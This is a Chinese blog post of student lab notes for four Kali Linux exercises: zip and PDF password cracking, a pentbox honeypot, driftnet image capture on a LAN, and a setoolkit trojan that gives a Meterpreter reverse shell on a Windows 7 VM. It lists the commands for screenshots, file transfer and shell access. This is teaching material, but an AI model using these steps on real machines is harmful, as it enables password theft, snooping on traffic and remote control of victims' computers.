网络安全四个实验

已于 2022-11-23 18:45:12 修改
阅读量498 收藏 1
点赞数 1
分类专栏: kali 文章标签: 安全
于 2022-11-23 18:43:46 首次发布
abu-abab2002
本文链接:https://blog.csdn.net/abab200207/article/details/128005601
版权

密码破解

  • zip破解

    zip2jonh xxx.zip > hash.txt
john hash.txt

  • pdf文件密码破解

    1. 在wps中创建pdf,并设置密码输出 密码要简单6-8位的纯数字

    2. 把pdf文件用kali的root用户终端打开

    3. apt install pdfcrrack   #下载安装pdf破解工具

    4. 制作密码字典

      • touch miamzidian.txt       #创建
vim mimazidian.txt         #编辑

      • 编辑是常用的密码组合全写上包括你的pdf密码,并保存退出 wq!

      • pdfcrack -w mimazhidian.txt 1.pdf
#参数 -w 密码字典 pdf文件

蜜罐

  • 下载pentbox,解压并打开
wget  https://jaist.dl.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz         #下载pentbox
tar -xvf pentbox-1.8.tar.gz                                                                 #解压
cd pentbox-1.8                                                                              #切换目录
ruby pentbox.rb                                                                             #启动pentbox

  • 用pentbox创建蜜罐

    ---->2

    ----->3

    自动搭建 ------>1 或 手动搭建 ----->2

    手动搭建: -->8080 -->q -->y -->回车 -->y

    image-20221123170005132

    效果

    image-20221123171812259

局域网图片劫持

桌面上创建放照片的文件夹

cd /home/kali/Desktop 
mkdir tupian

kali进入root用户终端

driftnet                    #安装
driftnet -i eth0 -a -d      #开始抓取照片并保存到桌面上的文件夹

打开win7,随便搜索图片,回到kali会保存到桌面上的文件夹里

image-20221123180246622

局域网密码探测

windows木马测试

  • 进入kali终端root,输入setoolkit 打开该工具(制作木马)

    输入 —>1 —>4 —>2

    输入 —>kali 的 ip地址

    输入端口号 —>5555

    —>yes 回撤

  • 复制木马文件到桌面

    cp /root/.set/payload.exe /home/kali/Desktop/xxx.exe

  • 把木马拷贝到 win7 上,并调隐藏的后缀,运行

    计算机–工具–文件夹选择–查看–取消隐藏已知文件夹类型的扩展名

    点击木马exe文件,以管理员的身份运行

  • 回到 kali 实现 捕获截图,上传,下载,得到shell

    • 输入 sessions (会显示 win7 主机名和 IP 地址)

    • 输入 sessions -i 1 (得到 meterpret 命令行模式)

    • 输入 screenshot (捕获 win7 界面截图)

    • 上传

      upload /home/kali/Desktop/kali.txt   C:/Users/abu/Desktop

    • 下载

      download C:/Users/abu/Desktop/wondows.txt /home/kali/Desktop

    • 得到shell

      输入 shell
      输入 chcp 65001 #解决乱码问题(但是没有完全解决)

abab200207
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于计算机网络安全实验报告总结,信息安全实验总结报告
weixin_39805119的博客
06-18 4351
信息安全实验总结报告篇一:信息安全实验报告课程名称: 信息安全 实验名称: 共五次实验 班级: 姓名: 同组人:指导教师评定: 签名:实验一 木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。二、实验原理木马的全称为特洛伊木马,源自古希腊神话。木马是隐藏在正常程序中的具...
西安工业大学 计算机网络 四个实验
08-08
实验一主要涵盖了两个方面:网络命令的使用和交换机的基本配置。网络命令如`ping`、`traceroute`、`ipconfig`等,用于检查网络连接、追踪数据包路径以及查看设备IP信息。交换机配置则涉及到端口设置、VLAN(虚拟...
网络安全及包分析实验报告
m0_51456787的博客
07-08 4258
操作系统:windows server 网络平台:湘潭大学信息楼局域网 机器的IP地址:172.22.10.58(包括主要程序流程和函数说明,程序分工说明 (软件部分)) (包括网络拓扑图,配置清单(硬件))(2) 点击“高级设置”,进入“高级设置”页面后,点击“入站规则”或“ 出站规则”。 (3) 点击“新建规则”,选择“端口”,并点击“下一步”。这里就可以选择协议类型TCP或UDP,以及需要筛选的端口。设置完成之后,点击下一步。 (4) 选择需要的操作,并点击“下一步”。 (5) 选择此规则应用的区域,
哈工大网络安全实验四报告
qq_44021627的博客
12-16 1768
哈工大网络安全实验四报告
网络安全-PKI实验
zdsxc_的博客
10-21 5070
通过本次PKI实验的学习,我对加密解密、数字签名、以及其中的顺序和理念有了深入的了解,密码学也是非常重要的基础,安全不仅仅是个人的安全,更是国家的安全,通过以学习PKI加密的实验,再进行公钥认证的原理和流程的学习,也让我对这套加密体系有了深入的理解,收获很多。
网络安全实验七:防火墙实验
bueke的博客
12-16 7375
班级 软件工程17-1 学号 31720520518*** 姓名 路向江 同组实验者 路向江的儿子宴鸡鹏 实验名称 防火墙实验 日期 2019年12月16日星期一 一、实验目的: 通过实验深入理解防火墙的功能和工作原理 熟悉天网防火墙个人版...
网络安全实验——web安全
weixin_58628068的博客
05-18 3173
XSS(Cross-Site Scripting)是一种常见的Web应用程序漏洞,攻击者可以通过注入恶意脚本来获取用户的敏感信息或者控制用户的账户。攻击者可以通过在输入框、URL参数等地方注入恶意脚本来实现XSS攻击。为了防止XSS攻击,应该对用户提交的数据进行过滤和转义,避免将用户输入的内容作为HTML或JavaScript代码直接输出到页面上。在盗取rookie(一个虚拟人物)的实验中,攻击者通过在评论中注入恶意脚本,来实现对rookie账户的控制。
网络安全实验3 漏洞扫描
热门推荐
一半西瓜的博客
11-02 1万+
赞赏码 & 联系方式 & 个人闲话 【实验名称】漏洞扫描 【实验目的】 1.熟悉X-Scan工具的使用方法; 2.熟悉FTPScan工具的使用方法; 3.会使用工具查找主机漏洞 4.学会对弱口令的利用 5.了解开启主机默认共享以及在命令提示下开启服务的方法 6.通过实验了解如何提高主机的安全性 【实验原理】 漏洞扫描是一种网络安全扫描技术,它基于局域...
哈工大网络安全实验二报告
qq_44021627的博客
12-16 3801
哈尔滨工业大学18级网络安全实验二报告
网络安全——SQL注入实验
网络工程
12-12 2387
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
网络安全——防火墙配置实验
m0_53533553的博客
11-12 6944
(1)要求172.16.10.20可以上网,并且可以访问DMZ区域的FTP和WEB服务 (2)172.16.10.10不能上网,但是能够访问DMZ区域的FTP和WEB服务 (3)内网用户通过NAT(easy-ip)的形式访问互联网。
实验网络安全.doc
10-06
网络安全实验:PGP密钥对的创建与加解密操作】 实验名称:使用PGP创建密钥...通过这个实验,学生不仅能了解PGP的基本概念,还能亲自动手实践,提高网络安全防护意识和操作技能,为日后的网络安全工作奠定坚实基础。
计算机网络安全实验
06-23
在这个实验中,我们重点关注的是密码学,它是网络安全的重要基石。实验所涉及的C语言代码涵盖了几种经典的加密算法,包括凯撒密码、单表密码,以及更复杂的AES(高级加密标准)、DES(数据加密标准)和RSA(公钥加密...
网络安全实验报告完整.doc
06-09
实验共分为四个部分,涵盖了加密认证、安全扫描与评估、网络攻防和Windows系统安全配置。 实验一:加密认证通信系统实现 在这个实验中,学生需要设计一个通信系统,支持消息和文件的加密传输,允许用户选择不同的...
网络安全虚拟仿真实验教学中心建设.pdf
09-20
该中心的建设需要涵盖信息安全人才培养全过程的“四类型六环节”的网络安全虚拟仿真实验教学体系,包括基础实验、专业实验、综合实验、科研创新实践等四种实验类型和认知实验、验证实验、设计实验、综合实训、毕业...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1061
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 431
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 542
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 837
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值